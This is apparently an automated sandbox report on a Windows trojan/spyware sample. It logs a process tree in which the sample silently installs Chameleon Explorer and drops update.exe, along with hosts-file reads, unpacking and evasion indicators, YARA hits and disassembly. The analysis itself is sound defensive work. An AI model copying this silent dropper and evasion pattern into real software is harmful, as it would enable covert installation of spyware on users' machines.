                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.380200036.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.380200036.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323886701.0000000001EC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.323886701.0000000001EC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340275075.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.340275075.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild< vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000002.381487636.00000000047DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEI vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.334621742.0000000001CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAMEe vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe, 00000000.00000003.334621742.0000000001CD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCHIVE vs B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                      Source: Chameleon Explorer.lnk.2.drLNK file: ..\..\..\..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: Chameleon Explorer.lnk0.2.drLNK file: ..\..\..\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@30/46@5/5
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile created: C:\Program Files (x86)\Chameleon ExplorerJump to behavior
                      Source: ChameleonExplorer.exe, 00000006.00000000.285360037.0000000000429000.00000020.00000001.01000000.0000000B.sdmpBinary or memory string: .csproj
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005272000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .slnpE(
                      Source: ChameleonExplorer.exe, 00000012.00000002.526368980.0000000005272000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .csprojpE(
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeVirustotal: Detection: 71%
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeReversingLabs: Detection: 76%
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregister
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorer
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /update
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /update
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /startup
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /startup
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe "C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /trialregisterJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /replaceexplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe" /updateJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe" /updateJump to behavior
                      Source: C:\Users\user\AppData\Roaming\update.exeProcess created: C:\Users\user\AppData\Roaming\update.exe C:\Users\user\AppData\Roaming\update.exe" Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe" 66670Jump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe "C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe"
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile created: C:\Users\user\AppData\Local\Temp\autEDA4.tmpJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3236:120:WilError_01
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeMutant created: \Sessions\1\BaseNamedObjects\ChameleonFolderMiddleClick
                      Source: C:\Users\user\AppData\Roaming\update.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-F23129DC-7702651A9
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\ExplorerHelper32.dll_backup, type: DROPPED
                      Source: Yara matchFile source: C:\Program Files (x86)\Chameleon Explorer\is-5C20L.tmp, type: DROPPED
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: unknownProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeProcess created: C:\Users\user\AppData\Roaming\cexplorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpProcess created: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeJump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpWindow found: window name: TMainFormJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpFile opened: C:\Windows\SysWOW64\MSFTEDIT.DLLJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic file information: File size 8148480 > 1048576
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x6fb000
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: B7CFD1D0AAD8B5D5DB5C17DA0519B1D18EC7663699F2B.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\AppData\Roaming\update.exeUnpacked PE file: 20.2.update.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
                      Obfuscated command line found
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
                      Source: C:\Users\user\AppData\Roaming\cexplorer.exeProcess created: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp "C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmp" /SL5="$50270,6397385,121344,C:\Users\user\AppData\Roaming\cexplorer.exe" /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0565152C push ecx; mov dword ptr [esp], edx2_2_0565152D
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0568D518 push ecx; mov dword ptr [esp], edx2_2_0568D519
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0562ADA4 push ecx; mov dword ptr [esp], eax2_2_0562ADA5
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650420 push ecx; mov dword ptr [esp], ecx2_2_05650424
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05650CC0 push ecx; mov dword ptr [esp], ecx2_2_05650CC4
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0561AF6C push 0561B005h; ret 2_2_0561AFFD
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_05629F40 push ecx; mov dword ptr [esp], eax2_2_05629F41
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_0564DFF0 push ecx; mov dword ptr [esp], ecx2_2_0564DFF4
                      Source: C:\Users\user\AppData\Local\Temp\is-63BQH.tmp\cexplorer.tmpCode function: 2_2_056507A4 push ecx; mov dword ptr [esp], edx2_2_056507A5
